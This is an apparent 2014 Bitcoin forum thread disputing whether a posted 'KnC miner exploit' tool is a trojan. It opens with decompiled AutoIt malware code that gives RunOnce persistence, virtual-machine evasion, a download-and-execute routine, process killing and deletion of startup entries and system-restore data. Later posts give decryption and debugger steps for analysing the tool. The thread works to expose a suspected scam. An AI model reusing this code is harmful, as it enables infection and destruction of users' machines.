RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs") FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR") FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR") If FileExists($unicode_startup & "\start.lnk") Then FileDelete($unicode_startup & "\start.lnk") EndIf Else EndIf EndFunc
Func _checkelevationenabled() $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA") If @error Then Return Local $struct = DllStructCreate("BOOL") Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct)) If @error Then Return SetError(@error) EndIf Return SetError($artn[0], 0, DllStructGetData($struct, 1)) EndFunc
Func antis() If WinGetText("Program Manager") = "0" Then Exit Else EndIf If ProcessExists("VboxService.exe") Then Exit EndIf If ProcessExists("VMwaretray.exe") Then Exit EndIf EndFunc
Func persistence() If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then $pathtovbs = ($uniscriptdir & "\" & "run.vbs") ShellExecute($pathtovbs) Exit EndIf EndFunc
Func downloader() If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then Else FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "") $random_download_name = Random(10000, 99999, 1) & ".exe" Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1) Do Sleep(250) Until InetGetInfo($hdownload, 2) Local $nbytes = InetGetInfo($hdownload, 0) InetClose($hdownload) ShellExecute($unicode_userprofile & "\" & $random_download_name) EndIf EndFunc
Func bsod() $a = ProcessList() For $i = 1 To UBound($a) - 1 ProcessClose($a[$i][0]) Next Exit EndFunc
Func botkiller() RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") FileDelete(@StartupDir & "\*.*") EndFunc
Func disable_syste_restore() If FileExists($uniscriptdir & "\check.txt") Then Else RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients") FileWrite($uniscriptdir & "\check.txt", "") EndIf EndFunc
Func _rundos($scommand) Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE) Return SetError(@error, @extended, $nresult) EndFunc
Global Const $prov_rsa_full = 1 Global Const $prov_rsa_aes = 24 Global Const $crypt_verifycontext = -268435456 Global Const $hp_hashsize = 4 Global Const $hp_hashval = 2 Global Const $crypt_exportable = 1 Global Const $crypt_userdata = 1 Global Const $calg_md2 = 32769 Global Const $calg_md4 = 32770 Global Const $calg_md5 = 32771 Global Const $calg_sha1 = 32772 Global Const $calg_3des = 26115 Global Const $calg_aes_128 = 26126 Global Const $calg_aes_192 = 26127 Global Const $calg_aes_256 = 26128 Global Const $calg_des = 26113 Global Const $calg_rc2 = 26114 Global Const $calg_rc4 = 26625 Global Const $calg_userkey = 0 Global $__g_acryptinternaldata[3]
[SNIP] ----------------- [SNIP]
Func loop() While 1 If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then __bsod($scriptname, False) EndIf If WinExists($path) Then bsod() Else EndIf Sleep(100) WEnd EndFunc
Yeah, why should I bother run this in a vm ? Nice game OP... but you loose ! Are you kidding me or what? Did you really just post the crypter's source?! What the hell has this to do with my source The source you just posted proofs that none of the functions included, except the anti virtuals, are being used. That was smart to let us look at the other way... I'm disapointed by meself, I should have seen that earlier... If you didn't even see that one, even after decompiling the exectuble, well, i'm sorry, but your unskilled then. Plus, if you followed the topic, i explicitly posted about crypting the source. Now for the last time, stop spamming my topic. I've had enough of your makes-no-sense posts here. If you really think you are all that mighty, then PM as i asked you, and we'll compare our sources. Then once again, you will be disapointed by yourself. For the third time in row.
|
|
|
|
bitpop
Legendary
Offline
Activity: 2912
Merit: 1060
|
|
January 28, 2014, 03:41:13 PM |
|
Show him lemmy, don't hold back.
|
|
|
|
steve15 (OP)
Member
Offline
Activity: 70
Merit: 10
|
|
January 28, 2014, 04:19:55 PM |
|
Here are my beliefs
ici_lemmy does not even own mining equipment.
Because, instead of trying out if he's rigs are exploitable yes or no, he straight goes to decompiling all files. Since he made not a single post in this thread before i posted my tool, i believe he was just waiting to try and exploit my tool in order to do nasty stuff with it.
Why else decompile before trying...
Dozens of PM's regarding this kind of "users" (i prefer the term hacker, but what's in a name...) are submitted to me by concerned miners.
For this reason, none of the exploit code can be found inside the main executables. I also crypted the files to prevent a run while sniffers are active, or virtual enviroments are detected. This was also posted by me before posting the tool.
As ici_lemmy himself posts, he is disapointed by himself. Why? Because for the third time in a row he posts decompiled code that does... nothing at all!
This proves to me his eager to get to the core files to abuse them.
If i had a program that was as evil as he tries to picture it, i whould have deleted it by now. Seems also logic that any AV/AM/FW scanner picked it up by now.
So for the last and final time:
IF YOU ARE PLANNING ON ABUSING THE SOURCE.. GET LOST, YOU CANT. IF YOU ARE PLANNING ON POSTING BULLSHIT FOR NOT BEING ABLE TO EXTRACT THE SOURCE.. GET LOST. IF YOU WANT TO TEST YOUR MINING EQUIPEMENT.. FEEL FREE TO DOWNLOAD AND TEST RUN and THEN POST YOUR FINDINGS.
I will no longer reply to any scriptkiddie out there, trying to get hold on the source, tested, approved and verified by KnC itself, to start hacking some machines.
As stated before, this is the kind of behaviour that makes me want to keep all next exploits to myself instead of sharing them. I would have been better of just mining with your rigs, smiling while reading your posts about it...
Thank you
|
|
|
|
Chancellor
|
|
January 28, 2014, 04:37:49 PM |
|
Here are my beliefs
And what if... 1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP. 2. You've made fuss about it here. 3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner. 4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners. Bullshit? Maybe. Impossible? Don't think so. Time will tell. IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.
|
BTC: 1GRx2H5esyFTucZCt1eX9tjpoqfMrbVHMT
|
|
|
ici_lemmy
Member
Offline
Activity: 75
Merit: 100
|
|
January 28, 2014, 04:41:20 PM Last edit: January 28, 2014, 04:55:16 PM by ici_lemmy |
|
@steve15 : I'm disapointed by myself because I have not exposed you earlier... For the analysis, quick answer because I have no more time to loose on this... OK, so here is my simple full process to expose the scam (so everyone with skills can do it) : - unrar the exe - remove the commented autoit script lines - modify the script in order to have the decrypted file (and removing the nasty things) - send the decrypted file to virustotal and here are the virustotal results : https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50 Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor. No need to thank me ! @admin : you should remove the link to the tool and ban steve Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability
|
|
|
|
steve15 (OP)
Member
Offline
Activity: 70
Merit: 10
|
|
January 28, 2014, 06:11:08 PM |
|
Here are my beliefs
And what if... 1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP. 2. You've made fuss about it here. 3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner. 4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners. Bullshit? Maybe. Impossible? Don't think so. Time will tell. IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure. You are right about some parts. 1. If the vulnerability is minor, would KnC upgrade their firmware? It is not just the public IP miners who are in danger 2: If i prepared a malicious software to take control over users miner, would i really opt for an EXE file you think? Preparing malicious software, and binding it in a simple PDF file, where i claim to describe the method would be far more efficient for that purpose. People are not suspicious about a PDF, and they need to open it anyway.
|
|
|
|
steve15 (OP)
Member
Offline
Activity: 70
Merit: 10
|
|
January 28, 2014, 06:22:01 PM Last edit: January 28, 2014, 06:38:31 PM by steve15 |
|
@steve15 : I'm disapointed by myself because I have not exposed you earlier... For the analysis, quick answer because I have no more time to loose on this... OK, so here is my simple full process to expose the scam (so everyone with skills can do it) : - unrar the exe - remove the commented autoit script lines - modify the script in order to have the decrypted file (and removing the nasty things) - send the decrypted file to virustotal and here are the virustotal results : https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50 Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor. No need to thank me ! @admin : you should remove the link to the tool and ban steve Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability You really are an idiot, excuse my language. Try this: - Download whatever executable file online, for example Firefox installer. - Scan with virustotal = 0/50 - Disasemble the exe or rar - Remove the commented lines - Modify the script to have the contents of the installer - Remove some lines - Send the decrypted file to virustotal = bam, at least 40/50 Every single executable known file in virustotal that gets modified with even 1 bit will get an instant alert. That is the main reason why you cant fake EXE file assembly without triggering an alert. Also notice our hashes: My hash : A5F3453E03DD2E4F356BEC7FB595B799A8EA6BE2C0466CE8550C74E247511870 Your hash: abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3 You scanned a "*.BIN" file. You could have uploaded WHATEVER file you wanted to upload. Hashcheck is not the same, so it is not the same file, period. That's called faking results. You file contains at lease 15 DLL files that are not even present in my code! THIS are the files included: Try this second method: Create any .NET project Google some UPnP / network scanning methods/modules/classes Compile and send to virustotal = bam, 40/50 So please, you have no idea what you are talking about. You still failed to post the actual exploit code also. You post the source from the crypter ITSELF to scare people, but you also fail to post the configuration file for it, so they can see i'm not using ANY of these 'scary' functions. At most, you can be considered a medium skilled cracker, but that is where this story ends for you ici_lemmy. Cracking, hacking and decompiling is more than running some cracked tools you found on thepiratebay.
|
|
|
|
ici_lemmy
Member
Offline
Activity: 75
Merit: 100
|
|
January 28, 2014, 06:38:54 PM |
|
As I said, I have no more time to loose with that... I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...
Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...
|
|
|
|
steve15 (OP)
Member
Offline
Activity: 70
Merit: 10
|
|
January 28, 2014, 06:40:48 PM |
|
As I said, I have no more time to loose with that... I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...
Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...
Just explain why you upload a whole different file, containing over more than 15 DLL files that are NOT in my file. Explain why your upload contains a Remote Service Application for example. Your posts are worth nothing dude. Get lost. And see my edits above in my last post.
|
|
|
|
Chancellor
|
|
January 28, 2014, 07:20:10 PM |
|
Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more i can do...
Regardless of what is really contained in this file (and it looks fishy indeed), the above quote is the most important thing. Steve15, if you wanted to play fair, you should disclose the vulnerability as a whole and in detail. Then: 1. Miners would know what the danger really is, without running some encrypted, suspicious executables. Then they can react fast and protect their rigs. 2. KNC would be forced to patch their firmware quickly, if really needed. 3. You would be acknowledged as the discoverer and would show your real pentesting skill. I would go for disclosure, especially as you said that KNC tried to hide the problem under the carpet. Instead, the fact is the whole story is directed by you in a way that try to encourage people to run some encrypted, probably dangerous, application. As ici_lemmy said, if they are dumb enough, well...
|
BTC: 1GRx2H5esyFTucZCt1eX9tjpoqfMrbVHMT
|
|
|
nuno12345
|
|
January 28, 2014, 10:39:43 PM |
|
One last shot... AutoIt script MD5 pass: 1baba19a29b940f09293c9f47030d79c AutoIt script, encrypted code: ">>>AUTOIT SCRIPT<<<" "wb" "%.15g" "0x%p" "True" "False" "%s (%d) : ==> %s.: %s %s" "Line %d:" "Line %d (File "%s"):" "Error: " "AU3_FreeVar" .... "SeDebugPrivilege" More at 001FE0D0 Processor/virtual env check Address=001A6A16, Destination=kernel32.IsProcessorFeaturePresent Debugger check stages Address=0019D7C6, Destination=kernel32.IsDebuggerPresent Address=001A7DB7, Destination=kernel32.IsDebuggerPresent Address=001B1EE1, Destination=kernel32.IsDebuggerPresent I guess your autoit exe has all the protection on the exe itself and an additional encryption on the AutoIt script inside, but your file needs to run it so it must know the password or how to decrypt it. Long long shot, open Exe2Aut in a debugger (you'll need to unpack it with UPX first). Breakpoint at 0x004026B9 and hit the "Decompile" button. When the debugger breaks you will have the password at the top of the stack.
|
|
|
|
ici_lemmy
Member
Offline
Activity: 75
Merit: 100
|
|
January 28, 2014, 11:05:58 PM |
|
Linux : $unzip minerProofOfConcept.zip $unrar e minerProof.exe $sed '/^;/d' crLyJ > tmp.au3 $nano tmp.au3 $//^^modify to keep only _crypt_* funtions and code call to _crypt_decryptdata with good param $cp * /windows/ And under windows : Send the resulting file to any antivirus... You'll see yourself
|
|
|
|
|